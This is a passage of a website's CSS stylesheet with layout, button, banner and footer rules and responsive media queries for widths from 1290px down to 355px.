    color: #777;
    background-color: #5cb85c;
    border-color: #4cae4c;
}

#main-banners .btn-xs,
#main-banners .btn-group-xs>.btn {
    padding: 10.8px 10px;
    font-size: 13px;
    line-height: 1.5;
    border-radius: 3px;
}

#main-banners .btn {
    padding: 16px 10px;
    height: auto;
    text-decoration: none;
}

#main-banners .btn:hover {
    background-color: transparent;
    border-color: #175a9c;
    background-color: #175a9c;
}

#main-banners .jumbotron2 *,
#main-banners .jumbotron2 em {
    color: #fff;
}

.desc-wrp {
    display: flex;
    justify-content: space-between;
    padding-right: 30px;
    font-size: 16px;
}

.desc-wrp__left,
.desc-wrp__right {
    width: 47%;
}

.cmp-wrp {
    font-size: 24px;
    margin: 20px 30px 20px 0;
    box-shadow: -0.7px 1.3px 0.1px 0.1px rgba(0, 90, 160, 1);
}

.cmp-title {
    display: flex;
    justify-content: center;
    align-items: center;
    width: 185px;
    height: 43px;
    background: rgba(0, 90, 160, 1);
    color: #fff;
}

.img-wrp>img {
    width: 100%;
    height: auto;
}

.img-wrp {
    padding-top: 17px;
}

.desc-wrp__left .tspan {
    margin: 50px 0 22px 0;
}

.tspan {
    margin: 34px 0 22px 0;
    font-size: 17px;
    display: block;
    text-transform: uppercase;
    text-align: left;
}

.desc-wrp__right .tspan:first-of-type {
    margin-top: 0;
}

.p_underline {
    overflow: hidden;
}

.p_underline span {
    /* box-shadow: -0.7px 1.3px 0.1px 0.1px rgba(0, 90, 160, 1); */
    display: block;
    margin-bottom: 3px;
    padding-bottom: 25px;
}

.red_marker p {
    margin: 10px 20px;
    font-size: 16px;
}

.red_marker span {
    font-size: 16px;
}

.red_marker h2 {
    margin: 52px 0 30px 0px;
    font-size: 24px;
    line-height: 1;
}

.red_marker div {
    line-height: 1;
    font-size: 16px !important;
}

.red_marker strong {
    display: inline-block;
    margin: 18px 0px 6px 0;
    font-size: 16px;
    font-weight: 500;
}

.red_marker .mod {
    font-size: 24px;
}

.pages a {
    font-size: 12px !important;
}

.red_marker a {
    line-height: 1;
    display: inline-block;
    padding: 10px;
    max-width: 700px;
}

p.MsoNormal {
    font-size: 14px !important;
    margin: 10px 0 !important;
}

.banner a {
    line-height: 1;
}

section.flex {
    display: flex;
    flex-direction: row;
    justify-content: space-around;
    align-items: stretch;
    flex-wrap: wrap;
}

section.flex div {
    width: 50%;
    background: #e5e5e5;
}

section.flex a {
    color: #666666;
}

section.flex h3 {
    font-weight: 400;
    text-transform: uppercase;
    margin: 12px 0px 10px 11px;
}

section.flex img {
    float: right;
    border: 1px solid #666666;
    margin: 0 15px 10px 0;
}

.footer-wrapper {
    display: flex;
    flex-wrap: wrap;
    justify-content: space-between;
    align-items: center;
}

.footer-elem {
    margin: 25px 25px;
    display: flex;
    align-items: center;
}

div#copyright {
    margin: 25px 25px;
}

/* mobile style */

@media screen and (max-width: 1290px) {

    .red_marker p img {
        display: none;
    }

    .red_marker p {
        padding-left: 10px;
        padding-right: 10px;
    }

    #main #left {
        padding-top: 250px;
    }

    #man div {
        position: absolute;
        top: 110px;
        left: 0;
        color: black;
        background: transparent !important;
        line-height: 30px;
    }

    #man b+div {
        width: 70%;
    }

    #man div a {
        color: black;
    }

    .passiv {
        word-wrap: normal;
    }

    .passiv {
        display: flex;
        flex-wrap: wrap;
    }


}

@media screen and (max-width: 1160px) {
    div.head_phone {
        height: 120px;
        background-position: 0 25px;
    }
    
    div#contacts div {
        margin-bottom: 8px;
        line-height: 175%;
    }

    div#fnav {
        display: none;
    }

    div#contacts {
        display: flex;
        left: 20px !important;
    }

    div#search {
        right: 20px !important;
    }

    div#header {
        top: 150px;
    }

    #main #left .red_marker {
        padding-top: 35px;
        padding-left: 0;
    }

    #main #left {
        padding-top: 250px;
    }
}

@media screen and (max-width: 980px) {
    #right {
        display: none;
    }

    .desc-wrp {
        padding: 0 20px;
    }

    #man b+div {
        width: 90%;
    }


    #man div {
        left: 0;
    }
}

@media screen and (max-width: 930px) {
    #man div {
        top: 215px;
    }

    #main #left .red_marker {
        padding-bottom: 20px !important;
    }

    .desc-wrp__left,
    .desc-wrp__right {
        width: 100%;
    }

    /* .desc-wrp {
        flex-direction: column;
    } */

    #flash {
        width: auto;
    }

    div.menu1 {
        margin: 0 auto;
    }

    #main #left {
        padding-top: 200px;
    }

    div#menu {
        height: 200px;
        min-width: 0;
        display: flex;
        flex-direction: column;
        justify-content: center;
    }

    #menu_angle {
        display: none;
    }

    #main {
        padding: 0;
        min-width: auto;
    }
}

@media screen and (max-width: 700px) {
    .red_marker p {
        margin: 0;
    }

    img {
        border: 0px;
        margin: 0px !important;
        padding: 0px;
    }

    div#header {
        top: 200px;
    }

    div#search {
        background: none !important;
        top: 150px;
        right: 25% !important;
        transform: translateY(-50%);
        margin: 0 auto;
    }

    div#contacts {
        width: 90% !important;
        justify-content: space-around;
    }

    #main #left {
        padding-top: 250px;
    }

    #flash_bg {
        width: 100%;
    }

    #flash_bg img {
        width: 100%;
    }

    #flash_lines {
        display: none;
    }
}

@media screen and (max-width: 500px) {
    .table-special-wrapper {
        position: relative;
        max-width: 100%;
        height: 1285px;
        overflow-x: auto;
    }

    .table-special {
        position: absolute;
    }
}

@media screen and (max-width: 425px) {
    .left_autonics {
        display: none;
    }

    .desc-wrp {
        flex-direction: column;
    }

    section.flex {
        flex-direction: column;
    }

    section.flex div {
        box-sizing: border-box;
        width: 100%;
        padding: 0 20px;
    }
}

@media screen and (max-width: 375px) {
    div#menu {
        height: 230px;
    }

    #main #left {
        padding-top: 300px;
    }

    #man div {
        top: 240px;
    }
}

@media screen and (max-width: 355px) {
    div#contacts div {
        line-height: 170%;
    }

    div.head_phone div.one {
        font-size: 10px;
    }

    div.sec span.one {
        font-size: 15px;
        line-height: 30px;
    }
}